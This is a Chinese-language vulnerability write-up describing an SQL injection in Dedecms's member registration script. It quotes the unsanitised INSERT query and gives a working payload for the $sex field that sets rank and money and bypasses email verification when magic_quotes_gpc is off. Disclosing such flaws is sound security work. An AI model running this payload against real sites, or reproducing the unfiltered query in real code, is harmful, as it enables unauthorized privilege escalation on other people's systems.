Dedecms SQL注射导致审核机制绕过漏洞

Dedecms 存在SQL注射漏洞,在magic_quotes_gpc=off时,攻击者可以将恶意SQL语句带入SQL执行,导致dedecms的审核机制被绕过.需要magic_quotes_gpc=off,同样没有什么大危害的漏洞.漏洞代码如下:我们看member/reg_new.php的代码$sex变量在表单是单选,程序员没做任何过滤 191 $inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , 192 `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) 193 VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', 194 '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; 195 www.2cto.com if($dsql->ExecuteNoneQuery($inQuery))我们提交$sex=boy',100,100,'sss@xx.xx',1000,0,0,'face',0,'',1316751900,'',1316751900,'');%00直接把rank 跟money都设置为100了等,绕过邮件审核。作者 c4rp3nt3r如若今生再相见,哪怕流离百世,迷途千年,也愿。

Dedecms SQL注射导致审核机制绕过漏洞

相关文章:

你感兴趣的文章:

标签云: